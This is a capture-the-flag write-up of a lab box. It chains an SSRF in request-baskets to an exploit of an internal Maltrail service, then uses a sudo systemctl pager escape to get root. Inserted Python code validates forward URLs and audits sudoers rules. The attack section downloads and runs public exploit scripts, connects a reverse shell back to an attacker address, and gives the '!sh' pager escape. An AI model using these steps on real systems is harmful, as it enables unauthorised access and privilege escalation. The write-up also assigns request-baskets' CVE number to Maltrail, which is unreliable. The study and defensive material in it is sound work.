
Information Gathering

Port Scan

nmap 10.10.11.224 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 18:30 WIB
Nmap scan report for 10.10.11.224
Host is up (0.027s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    filtered http
55555/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 1.56 seconds

Initial Access

Port 80 seems interesting, but it shows as filtered: some service is probably running on port 80 that only internal hosts can reach. A web server is running on port 55555; the web application is request-baskets, which we can identify from the footer section.

This version is vulnerable to CVE-2023-27163, an SSRF (server-side request forgery). Through this SSRF we can see what application is running on port 80, so we perform the exploit with these commands:

wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash CVE-2023-27163.sh http://10.10.11.224:55555 http://127.0.0.1:80

Now we can access http://10.10.11.224:55555/dtnfva.
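The weakness exploited above is that the application fetches whatever forward URL a user supplies, including loopback and private addresses. As an added example (not code from request-baskets or from this writeup), here is the kind of validation a server should apply to a forward URL before fetching it: only http/https, every address the host resolves to must be routable, and IPv4-mapped IPv6 and bracketed literals are unwrapped so they cannot smuggle 127.0.0.1 past the check. The `resolver` parameter is an assumption for testability; the sample URLs are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_internal_address(ip: str) -> bool:
    """True for loopback, RFC 1918, link-local and other non-routable addresses."""
    addr = ipaddress.ip_address(ip)
    # ::ffff:127.0.0.1 is really 127.0.0.1; check the embedded IPv4 address.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any((addr.is_loopback, addr.is_private, addr.is_link_local,
                addr.is_reserved, addr.is_multicast, addr.is_unspecified))


def resolve_all(host: str, resolver=socket.getaddrinfo) -> list[str]:
    """Every address the host maps to; an IP literal maps to itself (no DNS)."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        pass
    # resolver has the socket.getaddrinfo shape: (family, type, proto, canon, sockaddr)
    return sorted({info[4][0] for info in resolver(host, None)})


def forward_url_allowed(url: str, resolver=socket.getaddrinfo) -> tuple[bool, str]:
    """Decide whether a user-supplied forward URL may be fetched server-side."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # strips userinfo, port and IPv6 brackets
    if not host:
        return False, "missing host"
    try:
        targets = resolve_all(host, resolver)
    except (socket.gaierror, OSError) as exc:
        return False, f"cannot resolve {host}: {exc}"
    for ip in targets:
        if is_internal_address(ip):
            return False, f"{host} resolves to internal address {ip}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the second mimics a hostname that resolves to a metadata endpoint.
    print(forward_url_allowed("http://127.0.0.1:80"))
    fake_dns = lambda host, port: [(None, None, None, None, ("169.254.169.254", 0))]
    print(forward_url_allowed("http://metadata.example/", resolver=fake_dns))
```

Two caveats for a real deployment: resolve once and connect to the validated address (or re-check on every redirect), otherwise DNS rebinding between check and fetch defeats the guard; and prefer an explicit allow-list of destinations over a block-list where the use case permits it.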

From the footer section we learn that Maltrail is running on port 80 ("Powered by Maltrail (v0.53)"), which is vulnerable to CVE-2023-27163. So let's exploit it:

wget https://github.com/spookier/Maltrail-v0.53-Exploit/raw/main/exploit.py
python3 exploit.py 10.10.14.2 1337 http://10.10.11.224:55555/dtnfva
Running exploit on http://10.10.11.224:55555/dtnfva/login

Privilege Escalation

Let's check the sudo rules:

python3 -c "import pty;pty.spawn('/bin/bash')"
sudo -l
...
User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
...

We found a rule; let's try the command:

/usr/bin/systemctl status trail.service

At the bottom the terminal hangs, much like running vim, because systemctl pipes its output through a pager. We can quit by typing q and hitting Enter, but we can also type !sh to get root access.
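The root cause here is a sudo rule that allows a command which drops into an interactive pager. As an added example (not part of the writeup), here is a small audit that scans sudoers-style lines for such rules and proposes the `--no-pager` form; the sudoers text is constructed for this example, and the parsing regex and tool lists are assumptions of the script rather than anything from the target.

```python
import os
import re
import shlex

# Constructed sudoers-style lines (not the target's real file).
SAMPLE_SUDOERS = """\
# comment line
Defaults env_reset
puma ALL=(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
ops  ALL=(ALL : ALL) NOPASSWD: /usr/bin/systemctl --no-pager status trail.service
ops  ALL=(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service --no-pager
web  ALL=(ALL : ALL) NOPASSWD: /usr/bin/journalctl -u trail.service, /bin/cat /var/log/trail.log
"""

# user host=(runas) TAG: cmd1, cmd2   (simplified sudoers grammar; no aliases)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Tools that hand the terminal to a pager unless told not to.
PAGING_TOOLS = {"systemctl", "journalctl"}
# Pagers and editors: interactive by design, so they always need review.
INTERACTIVE_TOOLS = {"less", "more", "man", "vi", "vim", "nano"}


def pager_issue(argv):
    """Return a reason string if this command line would end up in a pager/editor."""
    tool = os.path.basename(argv[0])
    if tool in INTERACTIVE_TOOLS:
        return f"{tool} is interactive and can run other programs from its prompt"
    if tool in PAGING_TOOLS and "--no-pager" not in argv[1:]:
        return f"{tool} pipes output through a pager unless --no-pager is given"
    return None


def suggest_fix(argv):
    """Hardened command line for paging tools; None when no mechanical fix applies."""
    if os.path.basename(argv[0]) in PAGING_TOOLS:
        return shlex.join([argv[0], "--no-pager", *argv[1:]])
    return None


def audit_sudoers(text):
    """Scan sudoers-style text and return one finding per risky command."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # Commas separate commands; arguments containing commas are out of scope here.
        for cmd in m.group("cmds").split(","):
            argv = shlex.split(cmd.strip())
            if not argv:
                continue
            reason = pager_issue(argv)
            if reason:
                findings.append({
                    "user": m.group("user"),
                    "command": shlex.join(argv),
                    "reason": reason,
                    "suggested": suggest_fix(argv),
                })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['user']}: {f['command']}\n  {f['reason']}\n  fix: {f['suggested']}")
```

Beyond `--no-pager`, the same effect can be had by pinning the pager for the rule (for example `SYSTEMD_PAGER=cat` via a wrapper script that sudo invokes), so the user never gets an interactive prompt. The script flags the rule from this box and leaves the two `ops` variants alone, since `--no-pager` is honoured wherever it appears on the command line.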